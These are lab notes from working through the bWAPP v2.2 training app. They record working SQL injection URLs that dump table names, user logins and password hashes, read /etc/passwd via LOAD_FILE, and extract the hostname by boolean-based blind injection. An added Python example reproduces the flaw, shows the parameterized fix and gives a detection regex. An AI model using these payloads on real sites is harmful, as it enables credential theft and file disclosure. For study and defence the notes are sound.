Notes From Bwapp V2.2

These are my quick notes that I recorded as I worked through bWAPP v2.2.

--- SQLi GET / Search Results - With security level set to low

URL with SQLi:
http://bwapp/sqli_1.php?title=a' union SELECT 1,table_schema,table_name,4,5,6,7 FROM information_schema.tables WHERE table_schema!='mysql' AND table_schema!='information_schema&action=search

The above query was taken from the MySQL SQL Injection Cheat Sheet located here.  The purpose of this query is to return the database and table names of the database.  I also had to experiment with the number of columns that were expected and how they were displayed.

Now I need to find out the structure of the tables...

URL for SQLi:
http://bwapp/sqli_1.php?title=a%27%20union%20SELECT%201,table_schema,%20table_name,%204,column_name,6,7%20FROM%20information_schema.columns%20WHERE%20column_name=%27password%27%20AND%20table_schema%20!=%20%27mysql%27%20AND%20table_schema%20!=%20%27information_schema&action=search

The above SQL injection returns the columns of the tables that contain the word password in them, so now we can formulate our query to begin extracting information.  The below query counts the records in the users table before we extract them, in case a lot of records are available to be extracted.

http://bwapp/sqli_1.php?title=a%27%20union%20SELECT%201,%20count%28*%29,%203,%204,%205,%206,%207%20FROM%20bWAPP.users%20where%20login!=%27zaz&action=search

This returns that there are two records that can be extracted.

http://bwapp/sqli_1.php?title=a%27%20union%20SELECT%201,%20login,%20password,%20email,%20admin,%206,%207%20FROM%20bWAPP.users%20where%20login!=%27zaz&action=search

The above query returned the login, password, email and whether they are an admin of the application in the search results...
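As an added example (not part of these notes and not bWAPP's own code), the following Python model of the search page shows why the payloads above work and how the fix looks. It uses an in-memory SQLite stand-in with constructed movies and users tables (the seven-column layout is an assumption chosen to match the seven values the UNION SELECT payloads supply), contrasts the string-concatenated query with a parameterized one, and adds a small log-side check that flags request URLs carrying the UNION SELECT / information_schema / LOAD_FILE markers seen in these notes.

```python
import re
import sqlite3
from urllib.parse import urlsplit, parse_qs, unquote_plus


# Constructed, in-memory stand-in for bWAPP's movies and users tables.
# The column layout is an assumption for this example (7 columns in movies,
# which is why the page's payloads hand 7 values to UNION SELECT).
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE movies (id INTEGER, title TEXT, release_year TEXT, genre TEXT, "
        "main_character TEXT, imdb TEXT, tickets_stock INTEGER)"
    )
    conn.execute(
        "INSERT INTO movies VALUES (1, 'Iron Man', '2008', 'action', 'Tony Stark', 'tt0371746', 53)"
    )
    conn.execute(
        "CREATE TABLE users (id INTEGER, login TEXT, password TEXT, email TEXT, admin INTEGER)"
    )
    # Constructed sample row; the password value is a placeholder, not a real hash.
    conn.execute(
        "INSERT INTO users VALUES (1, 'A.I.M.', 'constructed-hash', 'aim@example.invalid', 1)"
    )
    conn.commit()
    return conn


# The search-results payload from the notes: the quote closes the LIKE literal and
# the UNION appends rows from users (the app's trailing %' closes the injected literal).
PAYLOAD = "a' union SELECT 1,login,password,email,admin,6,7 FROM users where login!='zaz"


def search_vulnerable(conn, title):
    # The pattern the notes exploit: user-controlled input is concatenated into the SQL text.
    sql = "SELECT * FROM movies WHERE title LIKE '%" + title + "%'"
    return conn.execute(sql).fetchall()


def search_safe(conn, title):
    # Hardened form: a bound parameter. The driver never parses the value as SQL,
    # so the quote and the UNION are just characters of a search string that matches nothing.
    sql = "SELECT * FROM movies WHERE title LIKE ?"
    return conn.execute(sql, ("%" + title + "%",)).fetchall()


# Detection side: markers that appear in every payload recorded in these notes.
INJECTION_MARKERS = re.compile(
    r"\bunion\b\s+(all\s+)?\bselect\b|information_schema|load_file\s*\(", re.I
)


def flag_request(url):
    """Return the names of query parameters whose decoded value looks like a SQLi attempt."""
    flagged = []
    for name, values in parse_qs(urlsplit(url).query, keep_blank_values=True).items():
        for value in values:
            # parse_qs already percent-decodes once; decode again to catch double-encoding.
            if INJECTION_MARKERS.search(unquote_plus(value)):
                flagged.append(name)
                break
    return flagged


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", search_vulnerable(db, PAYLOAD))  # users row leaks through the UNION
    print("safe:      ", search_safe(db, PAYLOAD))        # [] - payload is just an unmatched title
    print("flagged:   ", flag_request(
        "http://bwapp/sqli_1.php?title=a%27%20union%20SELECT%201,%20count%28*%29,"
        "%203,%204,%205,%206,%207%20FROM%20bWAPP.users%20where%20login!=%27zaz&action=search"
    ))
```

The parameterized version is the actual fix; the marker regex is only a cheap triage signal for access logs and should be read as such, since encoding tricks and comment-based variants will not all match it.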

--- SQLi GET / Select - With security level set to low...

In this challenge it only returns one record at a time because, looking at the code, it does not loop through the recordset that is returned.  This adds a small challenge, but it is not impossible to do the same thing as above.

SQLi URL:
http://bwapp/sqli_2.php?movie=99%20union%20SELECT%201,table_schema,table_name,4,LOAD_FILE%28%27/etc/passwd%27%29,6,7%20FROM%20information_schema.tables%20WHERE%20table_schema%20!=%20%27mysql%27%20AND%20table_schema%20!=%20%27information_schema%27&action=go

The above query returns the 99th row of the union-selected query while also loading the /etc/passwd file, so we can gather the user names on the system.

SQL Injection Boolean Based

— The below method would allow for trying each character in a character set until it came back with the right character...
Iron Man' AND SUBSTRING(@@hostname,1,1) = 'b - Worked
Iron Man' AND SUBSTRING(@@hostname,2,1) = 'W - Worked

— What if we use regular expressions to determine whether the letter is within a range of characters...

Iron Man' AND SUBSTRING(@@hostname,1,1) REGEXP '[a-n] - Returns True
Iron Man' AND SUBSTRING(@@hostname,1,1) REGEXP '[a-g] - Returns True
Iron Man' AND SUBSTRING(@@hostname,1,1) REGEXP '[a-c] - Returns True
— This narrows it down to less than 8 queries to figure out the first character of the hostname...  It would have taken 2 or 28 depending on whether you started with a-z or A-Z.